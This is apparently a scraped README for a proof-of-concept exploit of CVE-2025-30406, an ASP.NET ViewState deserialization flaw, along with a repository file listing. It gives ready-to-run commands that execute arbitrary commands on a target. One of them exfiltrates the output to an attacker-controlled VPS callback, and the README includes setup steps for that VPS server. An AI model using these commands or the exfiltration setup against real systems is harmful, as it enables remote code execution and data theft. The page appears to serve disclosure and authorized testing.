来源

关联漏洞

描述

CVE-2025-30406 ViewState Exploit PoC

介绍

# CVE-2025-30406 ViewState Exploit PoC

## Overview
This is a Proof-of-Concept (PoC) script demonstrating a ViewState deserialization exploit for **CVE-2025-30406** in ASP.NET applications. It uses ysoserial to generate a malicious ViewState payload and sends it to a user-specified URL to execute a provided command. For best results, command output can be exfiltrated to a custom HTTP server (`server.py`) running on a VPS, which displays results in a styled format with timestamps, green prompts, and white output text. This script is intended for **educational purposes only** and must only be used on systems where you have **explicit permission** to perform security testing. Unauthorized use is illegal and unethical.

## CVE Details
- **CVE ID**: CVE-2025-30406
- **Description**: A deserialization vulnerability in ASP.NET ViewState handling that allows remote code execution when a valid validation key and generator are known.
- **Affected Systems**: ASP.NET applications with vulnerable ViewState configurations.
- **Prerequisites for Exploitation**:
  - Access to a valid ViewState validation key and generator.
  - A vulnerable endpoint accepting ViewState parameters.

## Repository Contents
- `exploit.py`: The main PoC script to generate and send the ViewState payload.
- `server.py`: An HTTP server to receive and display exfiltrated command output in a styled format.
- `README.md`: This file, with setup and usage instructions.

## Prerequisites
- Python 3.x
- `requests` library (`pip install requests`)
- ysoserial executable (Windows or equivalent for your platform)
- A vulnerable ASP.NET application endpoint
- A VPS or server to run `server.py` (recommended for exfiltration)
- Permission to test the target system

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/yourusername/cve-2025-30406-poc.git
   cd cve-2025-30406-poc
   ```
2. Install the required Python package:
   ```bash
   pip install requests
   ```
3. Download ysoserial and place it in the same directory as `exploit.py` or specify its path:
   - [ysoserial GitHub](https://github.com/frohoff/ysoserial)

## Setup on a VPS (Recommended)
To receive exfiltrated command output in a styled format, run `server.py` on a VPS:
1. Copy `server.py` to your VPS (e.g., via `scp`):
   ```bash
   scp server.py user@your-vps-ip:/home/user/
   ```
2. Ensure Python 3 is installed:
   ```bash
   sudo apt update && sudo apt install python3 python3-pip
   ```
3. Run the server (default port 8000):
   ```bash
   python3 server.py
   ```
4. Ensure the VPS firewall allows inbound traffic on port 8000:
   ```bash
   sudo ufw allow 8000
   ```
5. Note the VPS’s public IP or domain (e.g., `http://your-vps-ip:8000`) for use with the `-e` flag in `exploit.py`.

## Usage
### Running the Exploit
Run `exploit.py` with the required arguments. The `-e` flag is optional but highly recommended for exfiltrating command output to `server.py` for styled display.

```bash
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
```

#### Arguments
- `-u, --url`: Target URL (e.g., `http://target.com/page.aspx`) [Required]
- `-c, --command`: Command to execute (e.g., `whoami`) [Required]
- `-y, --ysoserial`: Path to ysoserial executable (default: `./ysoserial.exe`) [Optional]
- `-e, --exfil`: Callback URL for exfiltrating command output (e.g., `http://your-vps:8000`) [Optional]

#### Examples
1. Run without exfiltration (Blind execution):
   ```bash
   python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
   ```
2. Run with exfiltration to a VPS running `server.py` (recommended):
   ```bash
   python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
   ```

### Running the Server
On your VPS or local machine, start the HTTP server to receive exfiltrated output:
```bash
python3 server.py
```
The server will display command output with timestamps, a green `$` prompt, and white text for readability.

## How It Works
1. **Exploit Script (`exploit.py`)**:
   - Uses ysoserial with a hardcoded validation key and generator to create a ViewState payload.
   - If `-e` is provided, the command is wrapped to capture output and send it to the callback URL via `Invoke-WebRequest`.
   - Sends the payload to the target URL in a POST request, embedded in the `__VIEWSTATE` parameter.
   - Prints the server’s response status and a portion of the response body.
2. **HTTP Server (`server.py`)**:
   - Listens for GET requests containing command output.
   - Decodes the URL path and splits it into lines.
   - Prints each line with a timestamp, green `$` prompt, and white output text.
   - Responds with HTTP 200 and “OK”.

## Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-30406 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
- Report vulnerabilities responsibly through coordinated disclosure or bug bounty programs.

## Limitations
- The hardcoded validation key and generator may only work for specific vulnerable applications. Users may need application-specific values.
- The exploit targets ASP.NET applications vulnerable to ViewState deserialization.
- The script assumes the target server processes the ViewState payload correctly.
- Cross-platform compatibility depends on ysoserial availability (primarily Windows-based).
- Exfiltration requires a publicly accessible server for the `-e` callback URL.

## License
This project is licensed under the MIT License. See the LICENSE file for details.

## Contact
For questions or feedback, please open an issue on this repository.

文件快照

 [4.0K]  /data/pocs/240bf489e2d2ee953c3544e6ccd730a4927fded1
├── [4.2K]  exploit.py
├── [5.8K]  README.md
├── [1.4K]  server.py
└── [546K]  ysoserial.exe

0 directories, 4 files

备注